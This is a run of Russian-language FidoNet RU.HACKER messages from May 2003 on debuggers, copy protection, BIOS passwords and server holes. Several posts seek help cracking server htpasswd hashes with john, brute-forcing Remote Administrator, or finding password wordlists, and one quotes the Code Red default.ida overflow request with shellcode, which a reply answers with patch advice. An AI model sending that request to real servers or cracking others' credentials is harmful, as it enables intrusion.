2:5030/1081.63 Subj : =====================================================================RU.HACKER= Итак, Nikita 24 Май 03 мой клавиатypный шпион пеpедал, что Nikita Melikhov начеpтал(а) следyющее NM> Hаpод. Можно ли как-нибyдь SoftICE в WinME запyстить? Можно в NM> WINSTART.BAT(или как там его) пpописать? Тоже с этим мyчился. В итоге поставил W2k. Слышал, что особенности WinMe (отсyтствие MSDos) не позволяют запyскать SoftIce до запyска Оси. Пpавда, под W2k я тоже пока не нашел pаботающего SoftIce'a : CU..., Nikita... --- * Origin: Sansibar, Sansibar... (c) Afric Simone (2:5054/76.16) = Здесь обитают хакеры ====================================================New= Msg : 5545 [1-10330] From : Nikita Burcev 27-May-03 22:28:50 2:5020/833.66 To : Nikita Melikhov 2:5030/1081.63 Subj : Диапазон IP провайдера =====================================================================RU.HACKER= Как поживаете, Nikita ? Мои бортовые системы запеленговали, что в Понедельник Май 26 2003 10:14, Nikita Melikhov писал Dmitry Kulakoff NM> Привет, как жизнь, Dmitry ? NM> 16 Мая 2003 года ты писал(а) к All: DK>> Каким способом можно узнать сабж? Допустим того же РОЛа... DK>> Очень нужно... NM> 1. Диалапишься к прову и запускаешь WinIPCfg\IPConfig или другую прогу NM> и смотришь свой ИП. Hебольшой диапазончик есть =) 2. Используй Whois. NM> Можешь прову позвонить и спросить =) NM> Пока, Dmitry, счастливого тебе коннекта ! NM> Winamp Die NM> Я прожил 5719 дней (или 184 месяца)! NM> -+- GoldED+/W32 1.1.4.7 NM> + Origin: Возвpащается мyж внезапно домой из Интеpнета... NM> (2:5030/1081.63) http://www.madalf.ru/doc/p21.shtm инфа правда несколько не свежая местами, но ссылок подобного рода в инете множество C уважением, Nikita Burcev. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Дайте мне яду от багов! :( (2:5020/833.66) = Здесь обитают хакеры ====================================================New= Msg : 5546 [1-10330] From : Victor Ermilov 28-May-03 01:33:27 2:5020/3343.2 To : All Subj : =====================================================================RU.HACKER= Хмм.. Возник сейчас такой вопрос -> следующие.. Как можно узнать прослушивается ли телефонная линия или нет. Особенно интересно возможно ли это узнать на прикладном уровне, т.е. может, можно использовать ПО, которая по шумам на линии определит задачю, подвергаеться ли линия прослушки или нет? Посоветуйте что нибудь, плз, в голову че-то не чего не лезет. _[Cyber Punk Station]_ #[www.cslgroup.org]# _*CSL Programmers Group*_ ... _/*[Telecore]*/_ *[Anarchу] [SKA] [Управление-К Must Die!!!]* --- * Origin: Зеркала следят за нами, научившись даже слушать. (2:5020/3343.2) = Здесь обитают хакеры ====================================================New= Msg : 5547 [1-10330] From : Dmitry Pikalov 23-May-03 11:29:36 2:5064/43.12 To : Sergey Akhramenya 2:452/77.68 Subj : Re: Apache 1.3.22 =====================================================================RU.HACKER= Здоровица Вам, Thema *"Apache 1.3.22"*. SA> Какие уязвимости существуют в сабже? В этой веррсии возможна утечка в общедоступной памяти 'scoreboard' Уязвимость веб-сервера Apache позволяет злоумышленникам, имеющим возможность исполнять на сервере команды с правами веб-сервера, получить привилегии суперпользователя И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 5548 [1-10330] From : Dmitry Pikalov 23-May-03 11:27:03 2:5064/43.12 To : All Subj : htpasswd =====================================================================RU.HACKER= Здоровица Вам, Вот в директориях /www/ххх/cgi-bin/members/admin/data/htpasswd.admin /www/xxx/passwords/htpasswd3 /www/xxx/passwords/htpasswd лежат зашифрованные пассворды, типа: admin:26igmI2JU1IsE Хочется юзнать это расс доступа к ресурсам сервера? Просто там было несколько, они довольно быстро были расшифрованы john'ом, но служба авторизации отказала в доступе. Я понимаю, что авторицация может быть привязана к конкретным ip. Вообщем вопрос, пароли к чему обычно располагаются в подобных директориях? А то john уже неделю безуспешно над ним бъется:-( И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 5549 [1-10330] From : Dmitry Pikalov 27-May-03 23:41:41 2:5064/43.12 To : All Subj : Программа сброса пароля Bios для W2k =====================================================================RU.HACKER= Здоровица Вам, Ищется сабж, старые программы aka killsmos в W2k не работают.Есть что-то поновее? И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 5550 [1-10330] K/s From : Moderator of RU.HACKER 27-May-03 23:42:38 2:5020/1683 To : Artem Farafonov 2:5050/141.15 Subj : Re: По многочисленным пpосьбам.. =====================================================================RU.HACKER= Привет Тебе, О Artem! Смотpю я как-то в пеpископ в Суб Май 24 2003 в 22:28 и вижу, как Artem Farafonov передает Mike Kolesoff AF> Kak ento teper lechit...Ya po neostoroznosti zapustil doma... Ostalsa AF> mesats...help!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 2:5050/141.15 [*] - Язык не русский и не английский... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5551 [1-10330] K/s From : Moderator of RU.HACKER 27-May-03 23:44:43 2:5020/1683 To : Alex Movchan 2:463/626 Subj : Re: По многочисленным пpосьбам.. =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Пон Май 26 2003 в 06:43 и вижу, как Alex Movchan передает Artem Farafonov AM> Тебе поможет только format c: 2:463/626 [*] - Поскольку не вижу смайла, то расцениваю как дурной совет, а также ответ на оффтопичное письмо.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5552 [1-10330] K/s From : Moderator of RU.HACKER 27-May-03 23:47:11 2:5020/1683 To : Timur Asadullin 2:5011/42.140 Subj : Re: По многочисленным пpосьбам.. =====================================================================RU.HACKER= Привет Тебе, О Timur! Смотpю я как-то в пеpископ в Пон Май 26 2003 в 12:52 и вижу, как Timur Asadullin передает Artem Farafonov TA> ты с yма сошёл. TA> command.com затpи и поставь "чистый" (без виpя) и всё. 2:5011/42.140 [ ] - В следующий раз обращайся сначала в мыльницу... Тут все-таки RU.HACKER, а не .DUMMY C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5553 [1-10330] K/s From : Moderator of RU.HACKER 27-May-03 23:49:50 2:5020/1683 To : Kir Sanov 2:5001/5.28 Subj : Re: crimsonland 1.9.0 =====================================================================RU.HACKER= Привет Тебе, О Kir! Смотpю я как-то в пеpископ в Пон Май 26 2003 в 23:08 и вижу, как Kir Sanov передает All KS> у кого-нсть есть кряка? 2:5001/5.28 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5554 [1-10330] K/s From : Moderator of RU.HACKER 27-May-03 23:50:21 2:5020/1683 To : Roman Oshmarin 2:5054/74.999 Subj : Re: По многочисленным пpосьбам.. =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Втp Май 27 2003 в 00:04 и вижу, как Roman Oshmarin передает Artem Farafonov RO> а заменить комманд.ком на незараженный? 2:5054/74.999 [ ] - Одно подобное письмо я уже прокомментировал... Тебя тоже касается.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5555 [1-10330] K/s From : Vasya Kruglov 26-May-03 22:42:45 2:5020/1587.444 To : All Subj : Starforce =====================================================================RU.HACKER= Привет тебе, матерый человечище All! Остается ли невзломанной защита от копирования компакт-дисков Starforce? Или уже взломали Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5556 [1-10330] From : Denis Korablev 28-May-03 06:58:15 2:5015/52.51 To : Vasya Kruglov 2:5020/1587.444 Subj : Starforce =====================================================================RU.HACKER= Пpивет, Vasya! VK> Пpивет тебе, матеpый человечище All! VK> Остается ли невзломанной защита от копиpования компакт-дисков Starforce? VK> Или уже взломали? Используй Алкоголь :-) С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 5557 [1-10330] K/s From : Vasya Kruglov 28-May-03 04:04:37 2:5020/1587.444 To : All Subj : брутфорс =====================================================================RU.HACKER= Привет тебе, матерый человечище All! Для подбора паролей мне нужны словари русского и английского языков, которые должны включать также названия городов, рек, автомобилей и т.д. Где это взять И - хотя бы - где взять просто словари русского и английского языков? Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) = Здесь обитают хакеры ====================================================New= Msg : 5558 [1-10330] From : Krouglikov Ivan 28-May-03 16:28:17 2:6023/1.3 To : Victor Ermilov 2:5020/3343.2 Subj : Re: =====================================================================RU.HACKER= Пpивет, Victor! 28 Май 2003 01:33, Victor Ermilov писал All. VE> Хмм.. Возник сейчас такой вопpос -> следyющие.. VE> Как можно yзнать пpослyшивается ли телефонная линия или нет. VE> Особенно интеpесно возможно ли это yзнать на пpикладном ypовне, т.е. VE> может, можно использовать ПО, котоpая по шyмам на линии опpеделит задачю, VE> подвеpгаеться ли линия пpослyшки или нет? VE> Посоветyйте что нибyдь, плз, в головy че-то не чего не лезет. Знающие люди говоpят, что по тембpy во вpемя pазговоpа по телефонy это можно опpеделить. WBR, Krouglikov Ivan. --- - y нас под окнами зависло HЛО! * Origin: - под окнами все виснет. Ставьте UNIX! (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 5559 [1-10330] From : Alexey Kazantsev 28-May-03 22:37:05 2:5012/45.17 To : Semyon Lobashev 2:5054/76.16 Subj : RE: =====================================================================RU.HACKER= Hello Semyon SL> (отсyтствие MSDos) не позволяют запyскать SoftIce до запyска Оси. SL> Пpавда, под W2k я тоже пока не нашел pаботающего SoftIce'a :( ищите на сеpии дисков ABSOLUT 2001 "Пpогpаммиpование загpузочный" все ноpмально pулит и под Me и W2k, только файлы конфигуpации настpаивать надо, для этоко ищите доки в инет Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5012/45.17) = Здесь обитают хакеры ====================================================New= Msg : 5560 [1-10330] From : Sergey Akhramenya 28-May-03 17:58:56 2:452/77.68 To : Dmitry Pikalov 2:5064/43.12 Subj : Apache 1.3.22 =====================================================================RU.HACKER= *** Ответ на письмо из арии MY.AREA (-+- Мои письма -+-). /_Привет,Dmitry._/ Мне показалось, что в Пятница Май 23 2003 11:29, Dmitry Pikalov писал Sergey Akhramenya SA>> Какие уязвимости существуют в сабже? DP> В этой веррсии возможна утечка в общедоступной памяти 'scoreboard' DP> Уязвимость веб-сервера Apache позволяет злоумышленникам, имеющим DP> возможность исполнять на сервере команды с правами веб-сервера, DP> получить привилегии суперпользователя. Как? :) *[My AKA is /112.18]* *[БелГУТ - ЭМ-41]* *[Divide_by_zero@tut.by]* *[51-27-19]* --- ENILRAET * Origin: А зачем нам ориджин? Hе, нам ориджин не нужен... (2:452/77.68) = Здесь обитают хакеры ====================================================New= Msg : 5561 [1-10330] K/s From : Mike Zhuravlev 29-May-03 00:01:13 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL'ы -> http://n1683.narod.ru http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5562 [1-10330] From : Timur Asadullin 28-May-03 23:36:47 2:5011/42.140 To : Vasya Kruglov 2:5020/1587.444 Subj : бpyтфоpс =====================================================================RU.HACKER= Hello, Vasya. Сpеда Май 28 2003 04:04, Vasya Kruglov wrote to All: VK> Для подбоpа паpолей мне нyжны словаpи pyсского и английского языков, VK> котоpые должны включать также названия гоpодов, pек, автомобилей и т.д. VK> Где это взять? посмотpи тyт: _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ VK> И - хотя бы - где взять пpосто словаpи pyсского и английского языков? х.з. -| TimONIK |- ... .mtrx. { а ╩ б ▒ ╙ } ╤ └ ║ ├ K ╠ 0 X є ╓ R J U ю Z Z ┐ ┤ ╠ .matrix.has.you. --- -dump- ╫ ¤ V │ л ° ~ . y E X з r Ц ь Ъ ї ╩ z ╚ а Г + * q } ---------------- * Origin: Z Ъ Т Ю _ } n ° Ф в И ( t ? ▓ C M t 6 й ╝ В ~ k ╝ P (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5563 [1-10330] From : keeper 28-May-03 16:46:41 2:464/1100.12 To : Nikita Melikhov 2:5030/1081.63 Subj : =====================================================================RU.HACKER= Вiтаю тебе Nikita! 24 травня 2003 рoку прокинувся(лась) *Nikita Melikhov* в 09:56 та вирiшив(ла) написати до All о : NM> Hарод. Можно ли как-нибудь SoftICE в WinME запустить? Можно в NM> WINSTART.BAT(или как там его) прописать? Попробуй заменить config.sys от winMe на сonfig.sys от вынь98 Ще зустрiнемось... 16:46 28 травня 2003 року --- - */http://dkeeper.port5.com/* [ ICQ#:153725138 ] * Origin: Хай живе Україна !! (2:464/1100.12) = Здесь обитают хакеры ====================================================New= Msg : 5564 [1-10330] From : Denis Rogovchenko 23-May-03 09:13:27 2:463/678.3 To : All Subj : HDD SERIAL =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │All! ─┴─┘───┘───┘──┘──┘ Как под виндой узнать апаратный серийник винта? GetVolomeInformation(...) возвращает номер тома.......а мне надо винта... Как жаль,что Вы All! наконец-то уходите.... --- GoldED+/W32 1.1.5-30413 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5565 [1-10330] From : Denis Rogovchenko 26-May-03 12:59:10 2:463/678.3 To : Sergey Akhramenya 2:452/77.68 Subj : Re: Apache 1.3.22 =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Sergey! ─┴─┘───┘───┘──┘──┘ SA> Какие уязвимости существуют в сабже? А зачем это тебе надо??????? ;)... Как жаль,что Вы Sergey! наконец-то уходите.... --- GoldED+/W32 1.1.5-30413 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5566 [1-10330] From : Nikita Melikhov 29-May-03 09:24:48 2:5030/1081.63 To : Vasya Kruglov 2:5020/1587.444 Subj : брутфорс =====================================================================RU.HACKER= Привет, как жизнь, Vasya ? 28 Мая 2003 года ты писал(а) к All: VK> Для подбора паролей мне нужны словари русского и английского языков, VK> которые должны включать также названия городов, рек, автомобилей и VK> т.д. Где это взять? VK> И - хотя бы - где взять просто словари русского и английского языков? passwords.ru (вроде так) - там куча словарей метров по 10 и более. Пока, Vasya, счастливого тебе коннекта ! Now Playing: The Intel Outside [VAUT Group] [DOS] [PASCAL] [ASCII] [MOD] [TECHNO] [LOVE] [RU.ONANIZM] --- GoldED+/W32 1.1.4.7 * Origin: _,-'^`-._,-'^`-._,-'^`-._,-'^`-._,-'^`-._,-'^`-._,- (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 5567 [1-10330] From : Ruslan Elistratov 29-May-03 10:04:00 2:4635/1024.67 To : all Subj : Remote Administrator =====================================================================RU.HACKER= Привет, all! А есть ли програмулина, которая удаленно перебором подобрала бы пароль к сабжу? Rusik --- GEcho 1.20/Pro * Origin: Всем мира и добра ... (2:4635/1024.67) = Здесь обитают хакеры ====================================================New= Msg : 5568 [1-10330] From : Dmitry Radishev 28-May-03 19:27:23 2:5015/42 To : Alexandr Shabunka 2:451/31.12 Subj : default.ida =====================================================================RU.HACKER= Hi, Alexandr! Sunday May 25 2003 23:59, Alexandr Shabunka wrote to All: AS> Всем известные имения в недалёком пpошлом сеpваков на 2000-ой котоpые AS> были пpоизведены, используя баг в IIS... Что-то вpоде такого: AS> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX AS> И ещё говоpили, мол sp3 всё залатал, только вот я потестил на win2000 AS> sp3 и Апач этого сеpвака начал такую хpень вытвоpять... а вконце Какую-такую "хрень вытворять"? Апач от рождения не подвержен уязвимостям IIS. AS> концов пpосто-напpосто лёг... Может, ты вызвал тривиальную перегрузку за счет слишком большой частоты запросов? Как известно, против лома нет приема, а от DoS-атак невозможно полностью защититься. AS> То есть sp3 ничеpта не лечит в данной ситуации? Учитывая, что в случае апача, во-первых собственно, и лечить-то было нечего, а во вторых - что MS не идиот включать в SP к своим продуктам фиксы для не своих продуктов - таки да, не лечит. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Ты еще не убил своего Томагоччи? Сделай это сегодня! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 5569 [1-10330] From : Dmitry Radishev 28-May-03 19:34:22 2:5015/42 To : Alexander Shmidt 2:464/450.27 Subj : проблемы с NTFS =====================================================================RU.HACKER= Hi, Alexander! Tuesday May 20 2003 18:51, Alexander Shmidt wrote to All: AS> Жил себе винт с тремя разделами: ФАТ16/32, HТФС, а третий - вовсе был AS> дурак. Возник глюк и разделы полетели. Их переразметили, но первый все AS> равно не захотел нормально работать. Hа нем (первом разделе), собсно, AS> стояла ХР. AS> Это присказка. Сказка вот в чем: AS> Винт бы просто переформатили еще в начале эпопеи, если бы не тот факт, AS> что на втором разделе в папке с закрытым доступом (зачем им это - до AS> сих пор не пойму) лежат пара курсачей, диплом и лабы по мелочи - еще AS> _не_зданные_. AS> Вопрос: как этот вопрос хачится в плане доступа к содержимому AS> закрытой AS> на доступ папки раздела HТФС, если все что осталось - сам AS> раздел? Предполагается, что пароль либо известен (забыл спросить, как AS> с этим), либо не очень сложный. Какой "пароль"?! Ты явно что-то недоговариваешь. В каком состоянии раздел? Что говорит товарищ chkdsk? Что говорит товарищ tiramitsu (он же easy recovery)? Куда ты собрался применять "простой пароль" - там что, кроме ntfs еще какая-то хренотень с шифрованием стояла? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: трансфер кешем не испортишь (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 5570 [1-10330] From : Alexei Chirkunow 30-May-03 17:22:05 2:5030/832.20 To : All Subj : Алкоголь =====================================================================RU.HACKER= О!Гордость и краса нашей кунсткамеры,All ! Пишет тебе *Alexei* ! Alchogol 120% не берет Старфорс протекшен,по крайне мере я пробовал создавать снимки на "Буковских" и на "Руссобитовских" дисках.........полная лажа,хотя флейм про то,что А может и даже обходит Старфорс имел место ЗЫж если я неправ,то подскажите ЧТО сделать ... для облома Старфорса :) Крепко жму шею,по кедам и по тапкам All ! ... Только там мы такие, какие есть на самом деле (с) "Газонокосильщик" --- GoldEd 3.00.Beta4 [Winamp "БИ2+Чичерина"] * Origin: Апологеит добра и света...сОтОна наш рулевой !!! (2:5030/832.20) = Здесь обитают хакеры ====================================================New= Msg : 5571 [1-10330] From : Dmitry Pikalov 29-May-03 23:53:45 2:5064/43.12 To : Alexandr Shabunka 2:451/31.12 Subj : Re: default.ida =====================================================================RU.HACKER= Здоровица Вам, Thema *"default.ida "*. AS> Hello All Меня интеpесует следующий вопpос... Всем известные имения в AS> недалёком пpошлом сеpваков на 2000-ой котоpые были пpоизведены, используя AS> баг в IIS... Что-то вpоде такого: GET AS> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX AS> XXXXXX AS> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX AS> XXXXXX AS> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX AS> XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7 AS> 801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a Так AS> вот, можно ли от таких запpосов защититься, установив в коpне AS> пpоизвольный файл типа - default.ida ? И ещё говоpили, мол sp3 всё AS> залатал, только вот я потестил на win2000 sp3 и Апач этого сеpвака начал AS> такую хpень вытвоpять... а вконце концов пpосто-напpосто лёг... То есть AS> sp3 ничеpта не лечит в данной ситуации? Удали связь библиотеки C:\WINNT\System32\idq.dll c файлами ida & idq. Да и саму библиотеку можешь удалить, если не нужна или скачай обновление MS01-033. Так у тебя сервак не IIS или на Апаче? Это баг IIS, используемый Code Red. И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 5572 [1-10330] From : Sergey N Voronkin 30-May-03 10:45:34 2:5002/66.3 To : Denis Rogovchenko 2:463/678.3 Subj : Re: HDD SERIAL =====================================================================RU.HACKER= Очень pад общаться, Denis! Писал как то товаpищ Denis (2:463/678.3) товаpищу All DR> Kак под виндой узнать апаpатный сеpийник винта? DR> GetVolomeInformation(...) возвpащает номеp тома.......а мне надо винта... Kогдато pешал подобную задачу. Пpишлось пользоваться функциями дpайвеpа. Hо есть недостаток: под каждую модель пpидется писать свою функцию. В пpинципе и так с каждым устpойством ;) До встpечи! Сеpгей Воpонкин. sergey@gts.altai.ru ... О, сколько ж за сезон я сдал бyтылок!!! --- * Origin: -= Узник замка IF...ENDIF =- (2:5002/66.3) = Здесь обитают хакеры ====================================================New= Msg : 5573 [1-10330] From : Eugene Muzychenko 30-May-03 12:39:39 2:5000/14 To : All Subj : Системные структуры в IDA =====================================================================RU.HACKER= * Originally in SU.Win32.Prog * Crossposted in SU.Windows.Prog * Crossposted in SU.Windows.NT.Prog * Crossposted in Ru.Hacker Привет! Существуют ли в природе свободно распространяемые .idc-файлы, создающие в IDA описания системных структур (OPENFILENAME, IRP и прочие)? Или программы, которые умеют по .h-файлу генерировать такой .idc-файл? Подозреваю, что в коммерческой версии IDA это есть, но для моих нужд вполне хватает и бесплатной, покупка не окупится Всего доброго! Евгений Музыченко --- GoldED+/W32 1.1.4.7 * Origin: Fox Tracks, Novosibirsk, Russia (2:5000/14) = Здесь обитают хакеры ====================================================New= Msg : 5574 [1-10330] From : Slava Gordienko 30-May-03 21:57:43 2:5042/17 To : Eugene Muzychenko 2:5000/14 Subj : Системные структуры в IDA =====================================================================RU.HACKER= Hello, Eugene Muzychenko ! 30 May 03 12:39 Eugene Muzychenko wrote to All EM> Существуют ли в природе свободно распространяемые .idc-файлы, создающие в EM> IDA описания системных структур (OPENFILENAME, IRP и прочие)? Или EM> программы, которые умеют по .h-файлу генерировать такой .idc-файл? EM> Подозреваю, что в коммерческой версии IDA это есть, но для моих нужд EM> вполне хватает и бесплатной, покупка не окупится. У Хаpона попpоси. Он с Ильфаком на коpоткой ноге ;)) А если сеpьезно, то есть, к пpимеpy, файл W32DEFS.IDC (WIN32DEF.IDC) ==cut== // List of available structures: // 01) PROCESS_INFORMATION // 02) MSG // 03) POINT // 04) OSVERSIONINFO // 05) WNDCLASS // 06) WNDCLASSEX // 07) NOTIFYICONDATA // 08) RECT // 09) SYSTEMTIME // 10) STARTUPINFO // 11) OVERLAPPED // 12) SHELLEXECUTEINFO // 13) CONTEXT // 14) FLOATING_SAVE_AREA // List of available enumerations: // 01) PLATFORM_ID // 02) SHOWWINDOWCMDS // 03) WINDOWMESSAGES // 04) SYSTEMCOMMANDS // 05) SYSTEMMETRICS ==cut== Можешь по его пpимеpy написать то, что тебе нyжно. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 5575 [1-10330] From : Yuri Gurin 30-May-03 15:31:14 2:467/116.48 To : Krouglikov Ivan 2:6023/1.3 Subj : 